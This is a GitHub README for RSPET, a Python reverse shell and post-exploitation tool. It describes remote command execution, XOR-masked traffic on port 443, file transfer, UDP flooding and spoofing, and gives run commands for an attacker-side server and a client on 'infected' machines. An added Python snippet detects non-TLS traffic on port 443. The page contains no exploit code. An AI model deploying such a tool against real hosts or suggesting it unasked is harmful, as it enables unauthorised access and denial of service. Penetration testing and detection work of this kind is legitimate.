forked from panagiks/RSPET

RSPET (Reverse Shell and Post Exploitation Tool) is a Python based reverse shell equipped with functionalities that assist in a post exploitation scenario.

gxskar/RSPET

 
 


RSPET

MIT Licence Python 2.7 v0.2.7 Maintained Twitter

RSPET (Reverse Shell and Post Exploitation Tool) is a Python based reverse shell equipped with functionalities that assist in a post exploitation scenario.

DISCLAIMER: This software is provided for educational and PenTesting purposes and as a proof of concept. The developer(s) do not endorse, incite or in any other way support unauthorised computer access and networks disruption.

NOTE: The min folder has been removed. The added overhead of maintaining two versions led to min not receiving bug-fixes and important updates. If there is interest, both in using and maintaining, a more bare-bone and simplistic version, a new branch will be created to host it.

Current Version: v0.2.7

Follow: @TheRSPET on Twitter for updates.

Documentation : rspet.readthedocs.io

Features

  • Remote Command Execution
  • Traffic masking (XORed instead of cleartext); for better results use port 443[1]
  • Built-in File/Binary transfer (both ways) over the masked traffic
  • Built-in UDP Flooding tool
  • Built-in UDP Spoofing tool[2]
  • Multiple/All Hosts management; order File/Binary transfer and UDP Flood from Multiple/All connected Hosts
  • Modular Code Design to allow easy customization
  • Client script is tested and is compatible with PyInstaller (can be made into .exe)[3]
  • Full server side plug-in support.[4]
  • RESTful API for the Server Module.

*[1]The idea for XORing as well as the skeleton for the client came from primalsecurity.net so if you like this pack of scripts you'll probably love what they do

*[2]UDP Spoofing uses RAW_SOCKETS, so in order to utilize it the client has to run on an OS that supports RAW_SOCKETS (most Unix-based) and with root privileges. Finally, most ISPs have implementations in place that will either drop or re-structure spoofed packets.

*[3]Again check primalsecurity.net's perfect blogpost about producing an .exe

*[4]Detailed documentation on creating plugins available in Online Documentation!
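From the defender's side, the traffic-masking feature above has a visible property: XORed bytes sent to port 443 do not begin with a TLS handshake record, so the first payload bytes of each flow can be checked. The following is an added example in Python 3, not RSPET code; the flow records, addresses and XOR key are constructed for illustration.

```python
import struct

TLS_HANDSHAKE = 0x16   # TLS record content type: handshake
CLIENT_HELLO = 0x01    # TLS handshake message type: ClientHello
MAX_RECORD_LEN = 2 ** 14


def looks_like_tls_client_hello(first_bytes: bytes) -> bool:
    """True if a flow's first client payload starts a TLS ClientHello record."""
    if len(first_bytes) < 9:  # 5-byte record header + 4-byte handshake header
        return False
    ctype, major, minor, rec_len = struct.unpack("!BBBH", first_bytes[:5])
    if ctype != TLS_HANDSHAKE or major != 0x03 or minor > 0x04:
        return False
    if not 4 <= rec_len <= MAX_RECORD_LEN:
        return False
    hs_len = int.from_bytes(first_bytes[6:9], "big")
    # A ClientHello body holds at least a 2-byte version and 32-byte random.
    return first_bytes[5] == CLIENT_HELLO and hs_len >= 34


def flag_non_tls(flows, port=443):
    """Return flows to `port` whose first payload is not a TLS ClientHello."""
    return [f for f in flows
            if f["dport"] == port
            and not looks_like_tls_client_hello(f["first_bytes"])]


def sample_client_hello() -> bytes:
    """Constructed minimal ClientHello (zeroed random, one cipher suite)."""
    body = b"\x03\x03" + bytes(32) + b"\x00" + b"\x00\x02\x13\x01" + b"\x01\x00"
    hs = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return struct.pack("!BBBH", TLS_HANDSHAKE, 0x03, 0x01, len(hs)) + hs


# Constructed sample flows using private and documentation addresses. The XOR
# key 0x5A is an arbitrary assumption for illustration, not a value from RSPET.
SAMPLE_FLOWS = [
    {"src": "10.0.0.5", "dst": "192.0.2.10", "dport": 443,
     "first_bytes": sample_client_hello()},
    {"src": "10.0.0.7", "dst": "192.0.2.77", "dport": 443,
     "first_bytes": bytes(b ^ 0x5A for b in b"hostname-01\n")},
    {"src": "10.0.0.7", "dst": "192.0.2.20", "dport": 80,
     "first_bytes": b"GET / HTTP/1.1\r\n"},
]

if __name__ == "__main__":
    for flow in flag_non_tls(SAMPLE_FLOWS):
        print("non-TLS payload on 443:", flow["src"], "->", flow["dst"])
```

Flows whose captured first payload is shorter than 9 bytes are also flagged, so feed the check reassembled stream data rather than single small segments.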

Deployment:

  • rspet_server.py is situated at the attacker's machine and running to accept connections
  • rspet_client.py is situated in the infected machine(s) and will initiate the connection and wait for input.

Execution:

  • Server:

      python rspet_server.py (max_connections)

    max_connections defaults to 5 if left blank

  • RESTful API:

    • Install Flask with pip (only the first time)

      pip2 install Flask
    • Start the API

      python rspet_server_api.py
  • Client:

      python rspet_client.py server_ip

Many changes can be made to fit individual needs.

As always, if you have any suggestion, bug report or complaint, feel free to contact me.


Distros

A list of Distros that contain RSPET

As Featured in

Todo

  • Fix logic bug where, if a direct command to Host OS has no output, Server displays command not recognized
  • Fix logic bug where, if the execution of a direct command to Host OS is perpetual, the Server deadlocks
  • Add client version and type (min or full) as a property when client connects and at List_Hosts
  • Replace XORing with private key encryption (with random private key generated and traded upon connection)
  • Must find a way that does not require any extra installation on the client
  • Add a NoSQL (at least server-side) to store and handle traded keys
  • Add public key encryption in order to:
    • Encrypt the exchange of the private key
    • Verify the "authenticity" of clients
  • Add client update mechanism (initial thought was the use of execv but it acts up)
  • Add a plugin system to client (a more compact one)
  • Add remote installation of plugins to client
  • Add installed plugins report from client to server
  • Add UDP Reflection functionality
  • Provide more settings via config file
  • Re-introduce multithreading when handling multiple hosts.
  • Make commands available with 'Tab' automatically generated based on loaded plugins.
  • Fix logical bug when deleting a client. (Client still shows up on List_Hosts)
  • Create comprehensive plug-in creation guide.

Styleguide

This project is following Google's Python Styleguide with a minor variation on the use of whitespaces to align ":" tokens.

Contribution Opportunities

This project is open for contributors. If you have implemented a new feature, or maybe an improvement to the current code, feel free to open a pull request. If you want to suggest a new feature, open an issue. Additionally, testers are needed to run a few standard scenarios (and a few of their own maybe) to decrease the chance a bug slips into a new version. Should there be any interest in testing, a beta branch will be created (where code to be tested will be uploaded) along with a list of scenarios. For a full guide on contribution opportunities and guides, check out the "Contributing" chapter on RSPET's Online Documentation.

Author - Project Owner/Manager

panagiks

Co-Author

dzervas -- Code (Server OO-redesign, Server Plug-in system implementation, bug reports, bug fixes)

Contributors

  • b3mb4m -- Code (tab.py and bug fixes)
  • junzy -- Docstrings (udp_spoof & udp_spoof_send)

License

MIT
